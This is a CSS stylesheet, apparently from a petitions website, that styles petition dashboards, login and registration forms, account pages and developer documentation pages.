#how-why-content h2.trigger a {
background: url(../img/circle-arrow1.png) no-repeat 0 5px;
padding-left: 25px; }
#qa-content p {
margin: 0 0 10px 17px;
color: #737373;
line-height: 130%;
font-size: 1.083em; }
#how-why-content h2.row1 {
background: #FFF; }
#how-why-content h2.active a {
background: url(../img/circle-arrow3.png) no-repeat 0 5px;
padding-left: 25px;
color: #fff; }
#how-why-content h2.active {
background: #FFF;
filter: none; }
#how-why-content h2.trigger {
padding: 0 5px;
height: 28px;
line-height: 30px; }
#how-why-content .toggle-container {
background: #FFF;
border: none; }
img.img-float-right {
margin: 10px 0 0 15px; }
#how-why-content blockquote p.source {
margin: 5px 0;
font-family: Arial, sans-serif;
font-size: 12px;
line-height: normal; }
#how-why-content .media-wrapper {
margin: 0 0 20px 0; }
#how-why-content .api-gallery-page {
width: 756px; }
#how-why-content .project-row {
margin-bottom: 20px; }
#how-why-content .api-project {
width: 250px;
float: left;
padding: 1px; }
#how-why-content .api-project img {
border: 1px solid #d3d3d3; }
#how-why-content .project-intro {
padding-right: 10px; }
#how-why-content .api-project ul li {
font-weight: bold;
list-style: none;
margin-bottom: 4px; }
#how-why-content .api-project p {
font-size: 12px;
line-height: 16px;
margin-bottom: 10px; }
/****** My Petitions / Dashboard ******/
h2.section-title {
color: #333;
font-size: 1.25em;
padding: 0 0 10px 0; }
#my-petitions .entry {
width: 335px;
float: left;
position: relative; }
#my-petitions .last-entry {
margin-right: 0; }
#my-petitions .action-links {
width: 128px;
float: right; }
.action-links {
text-indent: -9000px; }
.action-links a, .action-links a.delete {
display: block;
float: left;
height: 36px;
width: 57px; }
#my-petitions .petition-list-group {
margin: 0 0 15px 0; }
#my-petitions a.finish {
background: url(../img/my-petitions-actions.png) no-repeat 0 5px; }
#my-petitions a.delete {
background: url(../img/my-petitions-actions.png) no-repeat 0 -50px;
margin-left: 8px; }
#my-petitions a.view, .petition-list .entry .view a {
background: url(../img/my-petitions-actions.png) no-repeat 0 -122px;
margin: 5px 0 0 67px; }
.fuzzy-divide {
background: url(../img/bg-fuz-divide.png) repeat-x;
height: 17px; }
#my-petitions .fuzzy-divide {
margin: 0 0 10px 0; }
.tag-status {
width: 74px;
height: 67px;
text-indent: -9000px;
position: absolute;
z-index: 300;
left: 261px; }
.add-margin .tag-status {
left: 261px; }
.entry-archived .tag-status {
background: url(../img/tag-petition-status.png) no-repeat 0 0; }
.entry-response .tag-status {
background: url(../img/tag-petition-status.png) no-repeat -82px 0; }
.entry-removed .tag-status {
background: url(../img/tag-petition-status.png) no-repeat -165px 0; }
/******* Petitions Removed Page ******/
/* No nav or seal on page */
body.petitions-removed-page #page {
background: url(../img/bg-page-no-nav.jpg) center top no-repeat;
margin: 0;
min-width: 976px;
padding: 0;
position: relative;
min-height: 1000px; }
body.petitions-removed-page #petition-outer {
position: relative;
top: -60px; }
body.petitions-removed-page .main-content {
float: none;
width: 687px; }
a#button-view-white-house-petitions {
display: block;
background: url(../img/sprite-buttons.png) no-repeat -223px -592px;
height: 33px;
width: 280px;
text-indent: -9000px;
margin: 0 0 15px 0; }
#petitions-removed .intro {
font-family: Georgia, serif;
color: #880000;
font-size: 1.5em;
margin: 0 50px 15px 0; }
#petitions-removed p {
line-height: 130%; }
.deleted-petition-divide {
background: url(../img/line-mid.gif) repeat-x 0 7px;
margin: 20px 0 20px 0; }
.deleted-petition-divide .title {
background: #FFF;
display: block;
width: 120px;
color: #880000;
font-weight: bold;
font-size: 1.167em; }
/* By The Numbers block */
#by-the-numbers .number {
color: #669900;
font-size: 1.333em;
display: block; }
#by-the-numbers .text {
padding: 1px 0 6px 0;
display: block; }
/* Misc */
#mask {
position: absolute;
z-index: 400;
background-color: #000;
display: none;
opacity: 0;
filter: alpha(opacity=0);
width: 100%; }
#comment-mask {
position: absolute;
z-index: 400;
background-color: #000;
display: none;
opacity: .78;
filter: alpha(opacity=78);
width: 100%; }
#petition-inner #wh-petitions-report-inappropriate-form {
padding: 0 0 20px 0; }
#petition-inner .delete-petition-overlay form {
padding: 0 0 20px 0; }
#form-item-search-drop {
margin: 25px 0 0 20px; }
#petition-inner #form-item-issues-filter {
padding: 0px; }
#petition-inner #form-item-search-drop .form-item {
margin: 0px;
width: 440px; }
#apply-modal a.close-button {
margin: -17px -17px 0 0; }
#apply-modal {
background: #FFF;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
padding: 25px;
height: 300px;
width: 450px;
left: -500px;
top: -200px; }
.display-none {
display: none; }
#thank-you-modal h3 {
color: #333333;
font-size: 1.167em;
font-weight: bold;
margin: 0 0 15px;
float: none;
width: auto; }
#petition-inner #wh-petitions-comment-petition-form {
padding: 0px; }
#petition-inner .form-item-petition-description,
#petition-inner .form-item-petition-tags {
width: 400px; }
#petition-inner form#create-petition-form-step-4, #petition-inner form#create-petition-form-thank-you {
padding: 0px; }
#petition-inner form#create-petition-form-step-1 .p-fuzzy-divide {
margin-top: 40px;
clear: both; }
#petition-inner #create-petition-form-step-2 {
padding: 0 0 55px 0; }
#edit-petition-issues .group {
width: 215px;
float: left; }
#petition-inner #edit-petition-issues label {
display: inline;
color: #737373;
font-size: 1em; }
#petition-inner #edit-petition-issues .form-item {
margin: 0 0 5px 0;
line-height: 1.6em; }
#petition-inner form .help-text {
text-align: right;
color: #737373;
font-size: 0.833em; }
#edit-petition-issues .form-item-checkbox {
margin-bottom: 5px; }
#petition-inner .view-tooltip, #petition-inner .view-tooltip-tag {
position: absolute;
top: 26px;
left: 415px;
font-size: 11px;
font-weight: bold;
text-align: left;
width: 230px; }
#petition-inner .view-threshold-tooltip {
position: relative; }
#petition-inner .tooltip {
left: 0px;
top: 20px; }
input#edit-delete {
width: 155px;
height: 25px;
background: url(../img/sprite-buttons.png) no-repeat -287px -209px;
margin: 0 0 5px 0; }
.petition-detail-publish-options input.button, .petition-detail-publish-options a.button {
display: block;
text-indent: -9000px;
font-size: 0;
line-height: 0; }
#email-page .email-petition-page input.button {
display: block;
text-indent: -9000px;
font-size: 0;
line-height: 0; }
.petition-detail-publish-options {
padding-left: 15px; }
#thank-you-modal .form-item {
margin: 0px; }
#closed-signatures {
padding-top: 0px; }
/*
#petition-outer {
top:163px;
position:relative;
}
*/
#petition-inner #title-tooltip {
left: 260px;
background: #fff;
top: 205px; }
#petition-inner #threshold-tooltip {
height: 190px;
left: 200px;
text-align: left;
top: -210px;
width: 500px;
background: #fff; }
#petition-inner .petition-detail #threshold-tooltip p {
font-size: 1em;
line-height: 1.5; }
#filter-page h3 {
color: #669900;
text-align: left;
font-size: 1.5em;
margin: 10px 0 20px 15px; }
#petition-inner #filter-page .form-item {
margin: 4px 0 0 0; }
#filter-page .button, .drop-down .blue-button {
clear: both;
float: left;
margin-top: 15px; }
#email-page fieldset legend {
display: none; }
#email-page .email-response h2.page-title {
color: #003366; }
#email-page .fieldset-wrapper, #email-page .fieldset-collapsed * {
display: block; }
#email-page #edit-subject, #email-page #edit-body {
display: none; }
#email-page form .grippie, #email-page form textarea {
width: 600px; }
#petition-inner #form-item-create-petition-title .help-text .view-some {
width: 240px; }
#petition-inner #edit-filter-issues label {
margin-bottom: 2px;
position: relative;
left: 22px;
width: 182px;
display: block; }
#petition-inner #edit-filter-issues input {
position: absolute;
width: 20px; }
#email-page h2.page-title {
margin-top: 0px; }
#email-page form {
padding: 0px; }
#email-page .form-item {
margin: 0 0 15px 0; }
#email-page {
padding-bottom: 100px; }
#email-page .email-response input {
text-indent: 0px; }
#petition-inner #form-item-search-drop label {
display: none; }
#petition-inner #wh-petitions-create-petition {
padding: 0px; }
/**** Sign in Create Account Page ****/
#sign-in-or-create-account .col-2 {
float: left;
width: 300px; }
#sign-in-or-create-account p {
line-height: normal;
font-size: 13px; }
#sign-in-or-create-account h3 {
font-size: 1.3em;
font-weight: normal;
margin: 0 0 7px; }
#sign-in-or-create-account .or {
background: url(../img/line-gr.gif) repeat-y center;
margin: 0 20px 0 15px;
min-height: 30px;
padding: 60px 0;
width: 50px;
float: left;
text-align: center; }
/* Overrides of main site styles */
#petition-inner .block ul {
margin: 0px;
padding: 0px; }
#petition-inner h2, h4, #petition-inner h1.title {
font-family: Arial,Helvetica,sans-serif;
font-weight: bold; }
#petition-inner .drop-down .header h2, #thank-you-modal .header h2 {
color: #FFF; }
#form-item-issues-filter input.form-checkbox {
margin: 0 3px 0px 0;
padding: 0 0 3px 0; }
#form-item-issues-filter .form-checkboxes {
margin: 0px; }
#petition-inner a:hover {
text-decoration: none; }
#petition-inner div.messages {
margin: 0 0 10px 0; }
#petition-inner .form-submit {
border: 0px; }
#petition-inner fieldset {
margin: 0px;
border: 0px;
padding: 0px; }
#petition-inner #wh-petitions-sign-petition-form {
padding: 0px; }
#petition-inner textarea {
outline: none; }
/*Text changes EOP-4234*/
#sign-this-petition p {
font-size: 11px;
color: #737373; }
.inactive-margin {
margin-top: 42px !important; }
.col-full {
float: left;
width: 675px; }
.hide {
display: none !important; }
/* User Pages */
/* Your Account */
.account-navtabs {
background: url(../img/bg-navtabs.png) repeat-x bottom;
font-size-adjust: none;
margin-top: 10px;
width: 715px;
font-family: Georgia,"Times New Roman",Times,serif;
font-size: 16px;
margin: 30px 0 8px 0; }
.account-navtabs ul {
padding-left: 22px; }
.account-navtabs li {
display: inline;
margin: 0;
padding: 0;
text-decoration: none; }
.account-navtabs li a {
text-decoration: none; }
.account-navtabs li.current a span {
background: url(../img/tabright.png) no-repeat right top;
color: #000;
display: block;
float: left;
padding: 6px 14px 4px 1px; }
.account-navtabs li a span {
color: #336699;
display: block;
float: left;
text-decoration: none;
padding: 6px 19px 4px 8px; }
li#profile-info a:hover span, #your-comments a:hover span {
text-decoration: underline; }
#content .account-navtabs li.current a {
background: url(../img/tableft.png) no-repeat left top;
float: left;
margin: 0;
padding: 0 0 0 11px;
text-decoration: none; }
#account-your-profile .button-wrapper {
border-top: 1px solid #e6e6e6;
padding: 15px 0 0 0;
margin: 25px 0 0 0; }
#account-your-profile .btn-make-changes a {
background: url(../img/btn-make-changes.png) no-repeat;
display: block;
width: 136px;
height: 23px;
text-indent: -9000px; }
#account-your-profile p {
font-size: 12px;
font-weight: bold;
letter-spacing: 0.02em; }
#account-your-profile span.label {
color: #666; }
.comment-content {
border-bottom: 1px solid #e6e6e6; }
#register-content .error-message, #user-page .error-message, #forgot-pass .error-message {
margin: 5px 25px 0 119px !important;
padding: 5px;
background-color: #fff2a8;
clear: both;
color: #C90000;
display: block;
float: left;
font-size: 0.917em;
letter-spacing: 0.02em;
text-align: left; }
#register-content p.email-list {
margin-left: 120px;
width: 300px; }
#register-content .form-checkboxes .form-item {
margin-bottom: 4px; }
#register-content .email-list-checkboxes {
margin-bottom: 4px; }
#register-content #edit-email-updates-wrapper label {
position: relative;
left: 85px;
width: 250px !important;
text-align: left;
font-weight: normal; }
/* User Registration */
.webform-client-form #webform-component-policy_comment #edit-submitted-policy-comment-wrapper label span,
.webform-client-form #webform-component-non_policy_comment #edit-submitted-non-policy-comment-wrapper label span {
display: none; }
.right-rail {
margin-top: 0px; }
.red-hint {
color: red; }
.padding-120 {
padding-left: 120px; }
.right-rail .more-link {
margin-bottom: 15px;
text-align: left; }
.right-rail .more-link a {
color: #336699 !important;
font-size: 12px;
font-weight: bold;
text-transform: none; }
.right-rail p {
margin-bottom: 20px; }
.more-link {
text-align: left;
margin-top: 30px;
margin-bottom: 20px; }
.more-link a {
background: url(../img/arrow-blue-next.gif) no-repeat right;
padding: 0 10px 0 0;
font-size: 12px;
/*16px x .625 = 10px */
letter-spacing: 0.06em;
font-weight: bold; }
.more-link a:hover {
text-decoration: underline; }
#forgot-pass p {
color: #666;
font-weight: bold;
font-size: 1em;
line-height: 1.5;
margin: 10px 0px 20px 0px; }
#user-page input#edit-submit, #user-page input#edit-submit:hover, #user-page input#edit-submit:focus {
background: url(../img/login/user_account_submit_btn.png);
width: 101px;
height: 32px; }
#user-page form#user-login input#edit-submit, #user-page form#user-login input#edit-submit:hover, #user-page form#user-login input#edit-submit:focus {
background: url(../img/login/user_account_login_btn.png);
width: 106px;
height: 32px; }
#user-page input#edit-submit {
background-position: 0px 0px;
margin-left: 108px; }
#user-page input#edit-submit:hover, #user-page input#edit-submit:focus {
background-position: 0px 32px; }
#user-page {
position: relative; }
#user-page .password {
position: absolute;
left: 210px;
top: 0px;
font-size: 1em;
line-height: 1.5;
margin: 0; }
#user-page #content, #forgot-pass, #user-profile-form #content {
border-right: 1px solid #CECECE !important;
float: left;
margin: 40px 10px 20px 70px !important;
padding: 0px 30px 0px 0px !important;
position: relative;
width: 520px !important; }
#user-page .password a {
text-decoration: none;
width: 200px; }
#user-page .password a:hover {
text-decoration: underline; }
#user-page label, #user-profile-form label {
color: #666666 !important;
font-weight: bold !important;
letter-spacing: 0.02em !important;
text-align: left !important;
text-indent: 3px;
display: inline-block !important;
width: 100px !important; }
#user-page .required-field-wrapper span {
background-image: none;
padding-left: 0px; }
#user-page .form-text {
width: 225px; }
#user-page .form-item .description {
padding-left: 109px; }
#user-profile-form #return-to-profile {
position: absolute;
right: 45px;
top: 0px; }
#register .webform-description {
border-bottom: none; }
#register #edit-profile-zip-wrapper span {
padding-left: 14px; }
#register #edit-email-updates-wrapper {
padding-left: 29px; }
#register .captcha {
padding-left: 61px; }
#register #forgot-pass .submit-wrapper input, #register #forgot-pass .submit-wrapper input:hover, #register #forgot-pass .submit-wrapper input:focus {
background: url(../img/login/user_account_submit_btn.png);
padding: 16px 51px 16px 50px;
margin: 20px 0 20px 166px; }
.main-content #forgot-pass .submit-wrapper input, .main-content #forgot-pass .submit-wrapper input:hover, .main-content #forgot-pass .submit-wrapper input:focus {
background: url(../img/login/user_account_submit_btn.png);
padding: 16px 51px 16px 50px;
margin: 20px 0 20px 166px; }
#register #edit-name {
height: 25px; }
#register .webform-client-form input.form-submit {
float: left; }
#register #edit-submit {
background-position: 0 0; }
.main-content #edit-submit {
background-position: 0 0; }
.main-content input#edit-submit, .main-content input#edit-submit:hover, .main-content input#edit-submit:focus {
background: url(../img/login/user_account_submit_btn.png) no-repeat;
width: 106px;
height: 32px;
/* margin: 20px 218px 0px 0px; */
margin-top: 20px; }
.main-content input#edit-submit {
background-position: 0px 0px;
margin-left: 108px; }
#register .submit-wrapper input:hover, #register .submit-wrapper input:focus {
background-position: 0px -98px; }
.main-content .submit-wrapper input:hover, main-content .submit-wrapper input:focus {
background-position: 0px -98px; }
.required-field-wrapper span {
background: url(../img/backgrounds/bg-star-required.gif) no-repeat 0 0;
padding-left: 14px;
margin: 0 0 0 55px; }
.user-account-btn {
background: url(../img/login/user_account_account_info.png) top left no-repeat;
text-indent: -9999px;
display: inline-block;
width: 310px;
height: 40px;
position: absolute;
bottom: 0px;
left: 65px; }
.login-buttons .login-tab, .login-buttons .sign-up-tab {
background: url(../img/login/user_account_tabs.png);
text-indent: -9999px;
display: inline-block;
width: 258px;
height: 40px;
position: absolute; }
.login-buttons .sign-up-tab {
background-position: 0px 0px;
left: 65px;
top: 108px;
height: 42px;
width: 275px; }
.login .login-buttons .sign-up-tab {
background-position: 0px 72px !important;
height: 34px;
top: 116px !important; }
.login .login-buttons .sign-up-tab:hover, .login .login-buttons .sign-up-tab:focus {
background-position: 0px 36px !important; }
.login-buttons .login-tab {
background-position: 278px 72px;
top: 116px;
left: 340px;
height: 34px;
width: 275px; }
.login .login-buttons .login-tab {
background-position: 278px 114px;
top: 108px !important;
height: 42px !important; }
.login .login-buttons .login-tab:hover, .login .login-buttons .login-tab:focus {
background-position: 278px 114px; }
.login-buttons .login-tab:hover, .login-buttons .login-tab:focus {
background-position: 278px -80px;
top: 116px;
left: 340px;
height: 34px;
width: 275px; }
#register #register-content label {
width: 100px; }
#register #right-rail, #user-page #right-rail, #user-profile-form #right-rail {
background-image: none !important;
width: 302px !important; }
#register #recaptcha_response_field {
background: url(../img/backgrounds/bg-form-item.png) repeat-x scroll 0 0 #fdfdfd;
border-color: #CECECE #DCDCDC #DCDCDC !important;
border-style: solid !important;
border-width: 1px !important;
color: #666666;
font-size: 12px;
padding: 3px 1px;
height: 25px; }
.login-header {
position: relative; }
.user-message ul {
display: block;
background: none repeat scroll 0 0 #FFCCCC;
color: #220000;
padding: 2px;
border: 1px solid #DD7777;
list-style: none;
font-weight: bold;
width: 900px;
margin: 20px 0px;
-moz-box-shadow: 1px 1px 1px #333;
-webkit-box-shadow: 1px 1px 1px #333;
box-shadow: 1px 1px 2px #333; }
.user-message ul li {
padding: 5px; }
.change-password-form-elements #edit-submit, .change-password-form-elements #edit-submit:hover, .change-password-form-elements #edit-submit:focus {
background-image: url(../img/login/user_account_save_changes_btn.png) !important;
width: 167px !important;
height: 32px !important; }
.change-password-form-elements #edit-submit {
background-position: 0px 0px; }
.change-password-form-elements #edit-submit:hover, .change-password-form-elements #edit-submit:focus {
background-position: 0px -33px; }
/* Login page */
#user-login {
font-size: 100%; }
#login .form-item label,
#user-login #login .form-item label,
#login form .form-item label {
width: 80px;
float: left;
margin: 2px 16px 0 0; }
#change-password #login form .form-item label {
width: 150px;
float: left;
margin: 2px 16px 0 0; }
#login .form-item,
#user-login #login .form-item,
#login form .form-item {
margin: 0 0 17px 0; }
#login .form-text,
#user-login #login .form-text,
#login .form-text {
width: 202px; }
form#login-form {
margin: -2px; }
#login p {
font-weight: 12px;
width: 300px; }
#login p#forgot-your-password {
margin: 5px 0 0 94px; }
#login .btn-login {
float: right;
margin: 5px 80px 0 0; }
#login .btn-login a, #change-password .btn-login a {
background: url(../img/btn-login.png) no-repeat;
display: block;
width: 67px;
height: 23px;
text-indent: -9000px; }
#login-services p {
margin-right: 55px; }
#login-services .rpx-links ul li {
float: left;
list-style-type: none;
margin-right: 8px; }
#login-services .rpx-links li a {
width: 40px;
display: block;
height: 40px;
text-indent: -9000px; }
#login-services li#fb-option a {
background: url(../img/icons-login-options.png) no-repeat 0 0; }
#login-services li#fb-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px 0; }
#login-services li#google-option a {
background: url(../img/icons-login-options.png) no-repeat 0 -40px; }
#login-services li#google-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px -40px; }
#login-services li#twitter-option a {
background: url(../img/icons-login-options.png) no-repeat 0 -80px; }
#login-services li#twitter-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px -80px; }
#login-services li#yahoo-option a {
background: url(../img/icons-login-options.png) no-repeat 0 -120px; }
#login-services li#yahoo-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px -120px; }
#login-services li#windows-option a {
background: url(../img/icons-login-options.png) no-repeat 0 -160px; }
#login-services li#windows-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px -160px; }
#login-services li#myspace-option a {
background: url(../img/icons-login-options.png) no-repeat 0 -200px; }
#login-services li#myspace-option a:hover {
background: url(../img/icons-login-options.png) no-repeat -40px -200px; }
.openid-link .form-item,
#openID-login .form-item {
background: url(../img/icon-openID.gif) no-repeat left top;
padding-left: 30px;
padding-right: 8px; }
#openID-login .description a {
margin-left: 6px; }
#openID-login ul {
padding-left: 0; }
#openID-login .btn-login {
float: right;
margin: 0; }
#openID-login .btn-login a {
background: url(../img/btn-login-grey.png) no-repeat;
display: block;
width: 67px;
height: 23px;
text-indent: -9000px; }
#login a:hover, #login-services a:hover {
text-decoration: none; }
#openID-login .form-text {
width: 180px;
float: left; }
p#what-is-openid {
margin: 5px 0 0 0; }
.change-password-form-elements {
width: 610px; }
.change-password-form-elements #edit-pass-wrapper {
border-bottom: 1px solid #e6e6e6;
border-top: 1px solid #e6e6e6;
padding: 20px 0; }
.change-password-form-elements #edit-pass-wrapper label {
color: #666;
float: left;
font-weight: bold;
letter-spacing: 0.02em;
margin: 6px 10px 0 0;
text-align: right;
text-indent: 3px;
width: 150px; }
.change-password-form-elements #edit-pass-wrapper .form-text {
background: #fdfdfd url(../img/backgrounds/bg-form-item.png) repeat-x scroll 0 0;
border-color: #CECECE #DCDCDC #DCDCDC;
border-style: solid;
border-width: 1px;
color: #666666;
font-size: 12px;
padding: 3px 1px;
width: 225px; }
.change-password-form-elements .form-item {
margin-bottom: 14px; }
.change-password-form-elements .password-strength,
.change-password-form-elements .password-confirm {
color: #666;
font-size: 12px; }
.change-password-form-elements span .error {
color: #c60; }
.change-password-form-elements span .ok {
color: #060; }
.change-password-form-elements .password-description {
padding: 4px 6px;
background: #fdfdfd;
border-color: #ccc;
color: #666; }
.change-password-form-elements .password-description li {
margin-left: 20px; }
/* Sign up */
input#edit-submit {
background-attachment: initial;
background-clip: initial;
background-color: initial;
background-origin: initial;
background-position: 0 -25px;
background-repeat: no-repeat no-repeat;
border-bottom-style: none;
border-color: initial;
border-image: initial;
border-left-style: none;
border-right-style: none;
border-top-style: none;
border-width: initial;
cursor: pointer;
display: block;
font-size: 0;
height: 29px;
line-height: 0;
margin-bottom: 10px;
margin-left: 0;
margin-right: 0;
margin-top: 24px;
text-indent: -9999px;
width: 100px; }
#content #sign-up a:hover, #post-comment-reply a:hover {
text-decoration: none; }
#sign-up .webform-description p.text-required {
margin-bottom: 10px; }
#receive-email-updates {
color: #666666;
font-family: Arial,Helvetica,sans-serif;
font-size: 0.75em;
font-weight: bold;
margin: 34px 0 30px 165px;
letter-spacing: 0.02em; }
#sign-up #edit-captcha-response-wrapper {
margin: 20px 0; }
#sign-up .submit-wrapper {
margin: 20px 0 0 0; }
#sign-up form.webform-client-form .form-item {
margin: 0 0 18px 0; }
#sign-up .webform-client-form .submit-wrapper input {
background: url(../img/btn-create-new-account.gif) no-repeat scroll 0 0;
border: medium none;
color: transparent;
display: block;
font-size: 0;
height: 25px;
line-height: 0;
overflow: hidden;
text-transform: capitalize;
width: 160px; }
#sign-up #recaptcha_widget_div {
margin-left: 50px;
margin-top: -15px; }
#register-content {
float: left;
margin: 40px 10px 20px 70px;
position: relative;
padding-right: 30px;
border-right: 1px solid #cecece;
width: 520px !important; }
#forgot-pass {
width: 590px;
margin: 20px; }
.main-content #forgot-pass h1 {
border-bottom: 1px solid #CECECE;
color: #666;
font-size: 1.75em;
font-weight: normal;
font-family: Arial,Helvetica,sans-serif;
line-height: 0em;
padding-bottom: 20px;
padding-bottom: 20px; }
#edit-email-updates-wrapper .option {
position: relative;
padding-left: 20px; }
#edit-email-updates-wrapper .form-checkbox {
position: absolute;
left: 0px;
top: 0px; }
#user-profile-form #register-content {
margin: 5px; }
.main-content #forgot-pass label {
color: #666666;
display: block;
float: left;
font-weight: bold;
font-size: 1em;
letter-spacing: 0.02em;
margin: 6px 16px 0 0;
text-align: left;
text-indent: 3px;
width: 150px; }
#user-profile-form #register-content label {
color: #666666;
display: block;
float: left;
font-weight: bold;
letter-spacing: 0.02em;
margin: 6px 16px 0 0;
text-align: left;
text-indent: 3px;
width: 550px; }
#register-content .form-checkboxes,
#register-content .form-radios {
clear: both; }
#register-content .form-checkboxes .form-item,
#register-content .form-radios .form-item {
float: left; }
#register-content .form-checkboxes,
#register-content .form-radios {
clear: both;
padding-left: 120px; }
#register-content .form-checkboxes label,
#register-content .form-radios label {
float: none;
text-align: left; }
#edit-profile-email-opt-in-wrapper,
#edit-notify-wrapper {
letter-spacing: 0.02em;
margin: 34px 0 30px 165px; }
#edit-profile-email-opt-in-wrapper label,
#edit-notify-wrapper label {
width: 330px;
text-align: left; }
#recaptcha_response_field {
background: #fdfdfd url(../img/backgrounds/bg-form-item.png) repeat-x scroll 0 0;
border-color: #CECECE #DCDCDC #DCDCDC;
border-style: solid;
border-width: 1px;
color: #666666;
font-size: 12px;
padding: 3px 1px; }
/* User Registration */
body.full-white #content {
width: 770px;
float: left;
padding: 25px 0 0 20px;
background: #FFF; }
body.full-white .extend-page {
background: #FFF; }
body.full-white #right-rail {
background: #FFF;
width: 50px;
min-height: inherit;
padding: 0;
margin: 0; }
#user-profile-form #register-content fieldset {
display: none; }
.user-profile-form-main-content #content {
width: 656px !important; }
#account-your-comments {
width: 615px; }
#account-your-profile {
margin: 20px 0 0 0;
width: 715px; }
#profile-header {
padding: 0 10px 5px 0; }
#user-page #profile-header {
border-bottom: 1px solid #DDDDDD; }
#profile-header h1 {
margin: 0px; }
#user-profile-form #profile
#account-profile {
margin: 10px 0;
padding: 0 0 10px 0;
border-bottom: 1px solid #E6E6E6; }
#account-profile h2, #account-preferences h2 {
color: #000;
font-size: 1.167em;
font-weight: normal;
letter-spacing: 0.07em;
margin: 0;
padding: 0px;
text-transform: uppercase; }
#account-profile span.label {
width: 100px;
display: inline-block;
font-weight: normal;
color: #666; }
#account-profile {
border-bottom: 1px solid #DDDDDD;
padding-bottom: 10px;
margin-bottom: 15px;
margin-top: 15px; }
#account-profile p, #account-preferences p {
margin: 10px 0 0 0;
color: #000;
font-weight: normal;
font-size: 1.167em; }
#account-preferences span.label {
padding: 0px;
font-weight: normal;
color: #666; }
.edit-change {
float: right;
display: block; }
.edit-change a {
text-indent: -9000px;
background: url(../img/button-edit-profile-change-password.gif) no-repeat 0;
height: 25px;
display: block;
width: 233px;
margin: 0 0 2px 0; }
.change-password-form-elements #edit-pass-wrapper {
border: 0px;
padding: 0px; }
.change-password-form-elements #edit-submit {
text-indent: -9000px;
background: transparent url(../img/button-save-changes.gif) no-repeat scroll 0 0;
height: 25px;
display: block;
width: 121px;
margin: 0 0 2px 0;
float: left;
border: none;
font-size: 0px; }
#login {
width: 378px;
float: left;
/*padding: 10px 0 0 40px;*/
padding: 10px 0 0 0; }
#login-services {
width: 359px;
float: left;
padding: 10px 0 0 0;
margin-left: 27px; }
#openID-login {
border-top: 1px solid #e6e6e6;
margin: 20px 0 0 0;
padding: 20px 0 0 0;
clear: both; }
#edit-openid-identifier {
width: 300px; }
#sign-up {
width: 590px; }
#register #sign-up {
width: 520px !important; }
#user-page #right-rail {
min-height: 600px; }
#user-profile-form #right-rail {
min-height: 600px; }
#user-profile-form ul.secondary a.active {
border-bottom: 0 none; }
#user-profile-form ul.secondary li {
border-right: 0 none;
font-size: 0.9em;
font-weight: bold;
letter-spacing: 0.04em;
padding: 0.5em;
text-transform: uppercase; }
#user-profile-form ul.secondary li.active {
border-left: 1px solid #DDDDDD;
border-right: 1px solid #DDDDDD;
border-top: 1px solid #DDDDDD;
border-bottom: 1px solid white;
padding-bottom: 6px; }
#user-profile-form ul.secondary {
border-bottom: 1px solid #DDDDDD; }
#user-profile-form ul.secondary li a {
text-decoration: none; }
#return-to-profile {
position: relative;
right: -18px;
top: 1px; }
#return-to-profile-bottom {
float: right;
position: relative;
right: 290px;
top: 6px; }
#return-to-profile #return-to-profile-bottom a {
font-size: 0.9em; }
/* User edit page styling */
.page-user-edit ul.petitions44-user-edit {
width: 600px;
border-top: 1px solid #BBBBBB;
border-bottom: 1px solid #BBBBBB;
margin: 5px;
margin: 0px 5px 5px 5px;
padding: 10px 5px 10px 5px; }
.page-user-edit ul.petitions44-user-edit li {
border-right: 1px solid #CCCCCC;
display: inline;
padding: 0 1em; }
.page-user-edit ul.petitions44-user-edit a {
padding: 0px;
text-decoration: none; }
.page-user-edit ul.petitions44-user-edit a.active {
border-bottom: 4px solid #999999; }
.page-user-edit input#edit-submit {
background-position: 0px 0px;
margin-left: 419px !important; }
.page-user-edit input#edit-submit,
.page-user-edit input#edit-submit:hover,
.page-user-edit input#edit-submit:focus {
background: url(../img/login/user_account_submit_btn.png);
width: 101px !important;
height: 33px !important; }
.page-user-edit input#edit-submit:hover,
.page-user-edit input#edit-submit:focus {
background-position: 0px -32px !important; }
#userreg-thanks {
background: url(../img/thank-you-bg.png) no-repeat scroll 0 0 transparent;
font-size: 20px;
height: 70px;
line-height: 25px;
margin-top: 4px;
padding: 8px 0px 0px 70px;
position: relative;
z-index: 100; }
/* Services Documentation */
.section-developers #petition-inner {
padding: 0; }
.section-developers #petition-inner #main-content-wrapper {
width: 100%; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version pre {
color: black;
font-family: courier;
font-size: .9em;
border: none;
padding: 10px;
margin: 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h1 {
color: #669900;
font-size: 1.667em;
letter-spacing: 0.04em;
margin: 20px 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h2 {
font-size: 2em;
margin: 1em 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h3 {
font-size: 1.8em;
margin: 1em 0;
text-decoration: underline; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h4 {
font-size: 1.6em;
margin: 1em 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h5 {
font-size: 1.3em;
margin: .5em 0 0 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version h6 {
font-size: 1em;
font-weight: bold; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-version-description {
border-bottom: double black;
margin: 0 0 2em 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-toc {
border-bottom: double black;
margin: 0 0 2em 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-toc ul {
margin: 1.5em 0 2em 0;
padding: 0; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-toc ul li {
margin: .5em 0;
font-size: 1.2em;
list-style: none; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-toc ul li a .verb {
color: #669900;
text-transform: uppercase;
min-width: 40px;
display: inline-block;
text-align: right;
margin-right: 7px; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-toc ul li a .path {
color: #0F3E72; }
.section-developers #petition-inner #main-content-wrapper .services-documentation-version .services-documentation-resources .services-documentation-resource {
padding: 0;
border: none; }
